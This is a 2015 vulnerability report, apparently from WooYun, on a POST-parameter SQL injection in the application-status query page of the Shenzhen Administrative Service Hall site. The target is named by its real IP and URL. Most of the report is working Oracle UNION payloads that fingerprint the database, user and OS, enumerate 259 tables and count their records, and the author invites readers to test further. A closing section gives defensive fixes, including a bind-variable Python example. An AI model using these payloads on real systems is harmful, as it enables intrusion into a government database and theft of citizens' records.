
A POST injection on the official website of the Shenzhen Administrative Service Hall (Oracle UNION, pure manual testing technique)

2015-09-07 04:15

The application-status query of the Shenzhen Administrative Service Hall online service system.

URL:

http://61.144.227.35/main/gb/adminhall/szzwresult.jsp



POST:

field2=201502163000016



Submitting arbitrary data produces an error message. A receipt number can be found on the home page, as shown in the figure:

[Figure: 0721_0.png]



A normal POST to the page looks like this:

[Figure: 0721_8.png]



The tools could not pull any data out... so it had to be done by hand...

See the screenshot:

[Figure: 0721_11.png]



Now the manual testing:

Determine the database type. After a round of testing it was determined to be Oracle. The test query:

field2=201502163000016' and  0<>(select count(*) from dual) --



Determine the number of columns; submit:

field2=201502163000016' order by 17--

The page renders normally...

Go straight to UNION. Because Oracle is strict about column types (each position must match the type of the original column one-to-one), the only thing that can be submitted is:

field2=201502163000016' UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--

The page renders normally.

Next, determine the column types by ruling them out one at a time; the final submission was:

field2=201502163000016'  UNION SELECT '1','2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--

[Figure: 0721_4.png]

Usable (displayed) columns: 1, 5, 9

What follows is the straightforward UNION process:

1. Check the version:

field2=201502163000016'  UNION SELECT '11'||((select banner from sys.v_$version where rownum=1)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--

[Figure: 0721_5.png]



2. Check the user name of the current connection:

field2=201502163000016'  UNION SELECT '11'||((select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--



3. Determine the operating system:

field2=201502163000016'  UNION SELECT '11'||((select member from v$logfile where rownum=1)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--



Result:

H:\ORADATA\SZGOV92\REDO01.LOG

It is a Windows system...

4. Tables; there are 259 tables in total:

field2=201502163000016' and (select count (*) from user_tables)=259 and 'kKTd'='kKTd

[Figure: 0721_2.png]



5. Table names:

field2=201502163000016'  UNION SELECT '11'||TABLE_NAME,'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from (select A.*,rownum rn from (select * from USER_TABLES) A where rownum<2) where rn>0--



The first table:

MEMBER_ACCOUNT



The other tables work the same way...

I wrote a program to enumerate the rest of the tables; the full run produced 259 table names.


6. Check the number of records in the tables:

field2=201502163000016'  UNION SELECT '11'||count(*),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from INQUIRY_USER--



[Figure: 0721_10.png]

5397 records



Submit:

field2=201502163000016'  UNION SELECT '11'||count(*),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from EXCHANGE_IN_TEMP_BJZT--



[Figure: 0721_12.png]

6313588 records



OK... that's enough for now.

I won't dump any other information... test it yourselves...

Proof of vulnerability:

[Figures: 0721_2.png, 0721_4.png, 0721_5.png, 0721_10.png, 0721_12.png]

Statement: no destructive operations were performed!

Fix:

Filter the parameter.

Add a WAF.
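As an added example (not code from the original report), here is what "filter the parameter" should mean for the field2 lookup: a whitelist check for a 15-digit receipt number, a bind variable instead of string concatenation, and a fixed error message instead of the database's own error text. The in-memory sqlite3 table and its rows are constructed stand-ins for the site's Oracle table; the `:receipt` bind syntax is the same style Oracle drivers use.

```python
import re
import sqlite3

# Receipt numbers on the page are 15 ASCII digits (e.g. 201502163000016);
# the whitelist accepts exactly that and nothing else.
RECEIPT_RE = re.compile(r"[0-9]{15}")


def is_valid_receipt(value) -> bool:
    """Whitelist check: no quotes, spaces, comment markers or SQL keywords can pass."""
    return isinstance(value, str) and RECEIPT_RE.fullmatch(value) is not None


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the site's Oracle table (schema and rows invented)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE apply_status (receipt_no TEXT PRIMARY KEY, status TEXT)")
    conn.executemany(
        "INSERT INTO apply_status VALUES (?, ?)",
        [("201502163000016", "approved"), ("201502163000017", "pending")],
    )
    return conn


def lookup_bound_only(conn, field2: str) -> list:
    """Bind variable instead of concatenation: the whole of field2 is compared as a literal
    receipt number, so a trailing ' order by 17-- or ' UNION SELECT ... never becomes SQL."""
    cur = conn.execute(
        "SELECT status FROM apply_status WHERE receipt_no = :receipt", {"receipt": field2}
    )
    return [row[0] for row in cur.fetchall()]


def lookup_status(conn, field2: str) -> list:
    """Defence in depth: reject anything that is not a receipt number before querying at all."""
    if not is_valid_receipt(field2):
        raise ValueError("field2 must be a 15-digit receipt number")
    return lookup_bound_only(conn, field2)


def handle_request(conn, field2: str) -> dict:
    """What the page handler returns: a fixed message for bad input, never a DB error
    (the original page echoed a database error for arbitrary input)."""
    try:
        return {"ok": True, "status": lookup_status(conn, field2)}
    except ValueError:
        return {"ok": False, "error": "invalid receipt number"}


if __name__ == "__main__":
    db = build_demo_db()
    print(handle_request(db, "201502163000016"))
    print(handle_request(db, "201502163000016' order by 17--"))
```

Binding alone already neutralises the probes from the report (they simply match no row); the whitelist check adds a second, independent barrier and keeps error output uniform.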


Source: www.wooyun.org/bugs/wooyun-2015-0128168
